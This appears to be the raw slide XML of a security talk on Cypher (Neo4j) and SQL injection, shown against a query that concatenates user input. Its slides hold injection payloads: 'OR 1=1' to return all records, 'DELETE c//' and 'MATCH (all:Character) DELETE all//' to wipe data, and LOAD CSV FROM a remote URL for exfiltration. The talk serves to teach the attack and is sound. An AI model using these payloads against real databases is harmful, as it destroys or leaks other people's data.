                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Spongebob -&gt; Spongebob” OR 1=1--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:highlight>
                <a:srgbClr val="E06666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3337" name="Google Shape;3337;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223950" y="2124325"/>
            <a:ext cx="8954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2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SELECT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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="22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FROM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“characters” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="22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 name = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Spongebob” OR 1=1--</a:t>
            </a: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8" name="Google Shape;333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311925"/>
            <a:ext cx="999438" cy="83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9" name="Google Shape;3339;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1996063">
            <a:off x="-87160" y="4152516"/>
            <a:ext cx="2505871" cy="46171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Iniciando el hackeo</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="18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40" name="Google Shape;334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4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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449650" y="900250"/>
            <a:ext cx="71331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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="784150"/>
            <a:ext cx="9144000" cy="15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7200"/>
              <a:t>Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3347" name="Google Shape;3347;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024600" y="2013797"/>
            <a:ext cx="70104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4800">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Returning back to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="48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Cypher</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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48" name="Google Shape;334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71525"/>
            <a:ext cx="2300700" cy="1714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49" name="Google Shape;334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4" name="Google Shape;3354;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370200" y="828225"/>
            <a:ext cx="7757400" cy="2649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p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="885250"/>
            <a:ext cx="88401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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="26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USER_INPUT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+ ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="26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6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 sz="26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 sz="26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6" name="Google Shape;3356;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> By Name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3357" name="Google Shape;3357;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="2599575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i="0" lang="en" sz="2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i="0" sz="2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" sz="26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i="0" lang="en" sz="2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c.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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'Spongebob'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2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6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i="0" lang="en" sz="2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i="0" sz="2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8" name="Google Shape;3358;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="204532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chemeClr val="dk1"/>
                </a:solidFill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Spongebob</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="6AA84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9" name="Google Shape;33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6450" y="3856150"/>
            <a:ext cx="1126575" cy="10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0" name="Google Shape;3360;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776450" y="3705375"/>
            <a:ext cx="1342200" cy="13032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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209925" y="810975"/>
            <a:ext cx="6580500" cy="2792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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552371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8" name="Google Shape;3368;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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USER_INPUT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+ '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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458572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0" name="Google Shape;3370;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - Return All</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3371" name="Google Shape;3371;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="2418400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c.name =’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike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OR 1=1 RETURN c//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 </a:t>
            </a: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2" name="Google Shape;3372;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1772225"/>
            <a:ext cx="52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OR 1=1 RETURN c//</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B6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p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071300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4" name="Google Shape;3374;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033226" y="3853221"/>
            <a:ext cx="1225563" cy="1189952"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3375" name="Google Shape;3375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76450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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6" name="Google Shape;3376;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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77" name="Google Shape;337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935" y="3870155"/>
            <a:ext cx="1156357" cy="1156391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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847076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9" name="Google Shape;337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9693" y="3870174"/>
            <a:ext cx="1156356" cy="11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0" name="Google Shape;338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5527" y="3850100"/>
            <a:ext cx="1196508" cy="119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1" name="Google Shape;338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5370" y="3850100"/>
            <a:ext cx="1196506" cy="1196498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3" name="Google Shape;3383;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="4905" t="2856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946825" y="639000"/>
            <a:ext cx="6498124" cy="37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4" name="Shape 3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5" name="Google Shape;3135;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452225" y="1214125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2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200"/>
              <a:t>Whoami</a:t>
            </a:r>
            <a:endParaRPr sz="4200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3137" name="Google Shape;3137;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339000" y="1146375"/>
            <a:ext cx="7704000" cy="3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Security Researcher @ MoonActive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-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AppSec-IL 2020 CTF Creators Team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Arial"/>
              <a:buChar char="-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Hacker by title, dancer by soul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Font typeface="Arial"/>
              <a:buChar char="-"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Dog owner / dog owns me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8" name="Google Shape;3138;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3391" l="0" r="0" t="3400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7358175" y="930876"/>
            <a:ext cx="1606500" cy="15438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39" name="Google Shape;3139;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24973" l="5196" r="18502" t="32536"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6959750" y="2645876"/>
            <a:ext cx="1202100" cy="13896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0" name="Google Shape;314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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="783450"/>
            <a:ext cx="3974700" cy="1143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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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USER_INPUT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+ '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0" name="Google Shape;3390;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - Delete</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3391" name="Google Shape;3391;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="2508025"/>
            <a:ext cx="914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c.name =’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike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DELETE c//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 </a:t>
            </a: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2" name="Google Shape;3392;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1772225"/>
            <a:ext cx="521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DELETE c//</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B65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3" name="Google Shape;3393;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4021624" y="3680681"/>
            <a:ext cx="1322872" cy="1284434"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3394" name="Google Shape;339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76450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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5" name="Google Shape;3395;p20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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396" name="Google Shape;3396;p20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094840" y="37213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7" name="Google Shape;3397;p20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3994889" y="37213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8" name="Google Shape;339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21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293650" y="1795325"/>
            <a:ext cx="1889100" cy="934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4" name="Google Shape;3404;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-208750" y="464350"/>
            <a:ext cx="6507300" cy="273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6000"/>
              <a:t>DELETE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6000"/>
              <a:t>EVERYTHING</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3405" name="Google Shape;34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2150" y="1118675"/>
            <a:ext cx="3691200" cy="38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6" name="Google Shape;340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0" name="Shape 3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1" name="Google Shape;3411;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366175" y="791525"/>
            <a:ext cx="1458000" cy="922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2" name="Google Shape;3412;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552371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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"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USER_INPUT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+ ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400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2400">
              <a:highlight>
                <a:srgbClr val="A8D5A8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4" name="Google Shape;3414;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458572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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="8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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> All</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3416" name="Google Shape;3416;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1740600"/>
            <a:ext cx="9144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WHERE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c.name =‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike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Spongebob’ </a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B6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MATCH (all:Character) </a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B6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highlight>
                  <a:srgbClr val="FF6B65"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>DELETE all//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 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7" name="Google Shape;3417;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071300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8" name="Google Shape;3418;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033227" y="3853221"/>
            <a:ext cx="1225563" cy="1189952"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3419" name="Google Shape;341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76450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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0" name="Google Shape;3420;p22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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21" name="Google Shape;342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5935" y="3870155"/>
            <a:ext cx="1156357" cy="1156391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3422" name="Google Shape;3422;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847076" y="3853417"/>
            <a:ext cx="1225500" cy="11901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3" name="Google Shape;342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69693" y="3870174"/>
            <a:ext cx="1156356" cy="11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4" name="Google Shape;342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05527" y="3850100"/>
            <a:ext cx="1196508" cy="119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65370" y="3850100"/>
            <a:ext cx="1196506" cy="1196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6" name="Google Shape;3426;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40948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7" name="Google Shape;3427;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="39948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8" name="Google Shape;3428;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55426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9" name="Google Shape;3429;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="54426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0" name="Google Shape;3430;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69904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1" name="Google Shape;3431;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="68904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2" name="Google Shape;3432;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26470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3" name="Google Shape;3433;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="25470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4" name="Google Shape;3434;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123040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5" name="Google Shape;3435;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1023089" y="3873716"/>
            <a:ext cx="1203300" cy="12033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36" name="Google Shape;343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0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p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967800" y="2150638"/>
            <a:ext cx="5176200" cy="20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1" lang="en" sz="44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4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? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="44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Character</a:t>
            </a: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4400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4400"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4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2" name="Google Shape;3442;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="363725"/>
            <a:ext cx="91440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800"/>
              <a:t>BuT We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="073763"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoN’t SeE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t> ThE QuErY!</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3443" name="Google Shape;3443;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10760" l="8688" r="2831" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1269925"/>
            <a:ext cx="5276999" cy="38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44" name="Google Shape;344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5" name="Google Shape;344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0800" y="1017050"/>
            <a:ext cx="2353200" cy="13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p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461725" y="638450"/>
            <a:ext cx="6363900" cy="356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p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407250" y="701200"/>
            <a:ext cx="8329500" cy="17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7200"/>
              <a:t>Data Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3452" name="Google Shape;3452;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228000" y="2742700"/>
            <a:ext cx="868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Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="4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LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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42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48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4" name="Google Shape;34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8549" y="3513323"/>
            <a:ext cx="1684776" cy="6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5" name="Google Shape;3455;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526950" y="34138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i="0" lang="en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9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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261400" y="1170125"/>
            <a:ext cx="71574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25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321825" y="1117625"/>
            <a:ext cx="84702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i="1" lang="en" sz="3800"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800"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i="1" lang="en" sz="3800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>CSV files.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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2" name="Google Shape;3462;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526425" y="-33775"/>
            <a:ext cx="39693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LOAD CSV</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3463" name="Google Shape;3463;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182575" y="1812150"/>
            <a:ext cx="90408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LOAD CSV FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> https://your-website/data.csv</a:t>
            </a:r>
            <a:endParaRPr b="1"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64" name="Google Shape;3464;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="3381" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321825" y="2936175"/>
            <a:ext cx="2843599" cy="2207324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3465" name="Google Shape;346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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592450" y="517600"/>
            <a:ext cx="4378200" cy="2344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26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
